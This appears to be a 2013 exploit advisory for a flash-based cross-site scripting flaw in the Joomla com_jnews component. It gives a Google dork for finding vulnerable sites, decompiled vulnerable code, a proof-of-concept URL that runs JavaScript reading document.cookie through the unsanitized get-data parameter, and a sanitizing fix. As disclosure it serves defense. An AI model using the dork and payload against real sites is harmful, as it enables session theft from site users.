# Exploit Title: Joomla com_jnews Open Flash-Chart XSS
# Release Date: 14/05/2013
# Author: Deepankar Arora And Rafay Baloch
# Blog: http://rafayhackingarticles.net
# Vendor: www.joobi.co
# Versions Affected: 8.0.1(latest) and earlier
# Google Dork: inurl:com_jnews

Description:

The vulnerability with Open-Flash Chart is a known vulnerability, however
it is integrated with com_jnews, The get-data parameter is not sanitized.
Therefore it results in a flash based cross-site scripting.

The vulnerable code is as follows:

var _local2 = open_flash_chart_data ";
            if (this.chart_parameters ["get-data"]) {
                _local2 = this.chart_parameters ["get-Data"];
            };
            if (this.chart_parameters ["id"]) {
                _local3 = this.callExternalCallback (_local2
this.chart_parameters ["id"]);
            } else {
                _local3 = this.callExternalCallback (_local2);
            };

We can see from the code that when called, get-data parameter is directly
passed to _local2 without proper sanitization.

POC:

http://localhost/joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()

Fix:

Sanitize the input.

_local2 = (this.chart_parameters ["get-Data"]).toString().replace(/[^\w]/g,
'');

The above would filter out all the special characters.

References:
http://www.wooyun.org/bugs/wooyun-2010-07265